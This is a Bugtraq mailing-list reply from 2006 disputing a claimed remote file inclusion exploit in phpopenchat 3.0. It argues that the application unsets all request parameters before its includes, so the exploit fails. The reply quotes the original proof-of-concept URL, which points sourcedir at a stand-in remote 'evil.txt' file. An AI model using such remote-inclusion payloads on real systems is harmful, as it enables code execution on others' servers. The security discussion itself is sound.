Bugtraq mailing list archives
Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
From: "Carsten Eilers" <ceilers-lists () gmx de>
Date: Fri, 8 Sep 2006 00:18:25 +0200
Hi, stormhacker () hotmail com schrieb am Wed, 6 Sep 2006 19:17:11 +0000:
-----------------Description---------------
include_once("QueryString.php");
include_once("Settings.php");
include_once("$sourcedir/Subs.php");
include_once("$sourcedir/Errors.php");
include_once("$sourcedir/Load.php");
//include_once("$sourcedir/Security.php");
Nice.
But you forgot the three little line above of this:
| $givenParams = array_keys($_REQUEST);
| foreach($givenParams as $param )
| unset(${$param});
And this...
--------------PoC/Exploit---------------------- http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http:// host/evil.txt?
... unsets your set sourcedir. Result: There is no vulnerability. Maybee $sourcedir is set/manipulated in QueryString.php or Settings.php, but these script see nothing about your manipulated sourcedir since it's unset before the includes.
--------------Solution--------------------- No Patch available.
No patch necessary. Regards Carsten -- Dipl.-Inform. Carsten Eilers IT-Sicherheit und Datenschutz <http://www.ceilers-it.de>
Current thread:
- WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit stormhacker (Sep 06)
- Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Carsten Eilers (Sep 07)
- AW: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Frank Reißner (Sep 08)
- Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Carsten Eilers (Sep 11)
- AW: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Frank Reißner (Sep 08)
- Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Carsten Eilers (Sep 07)
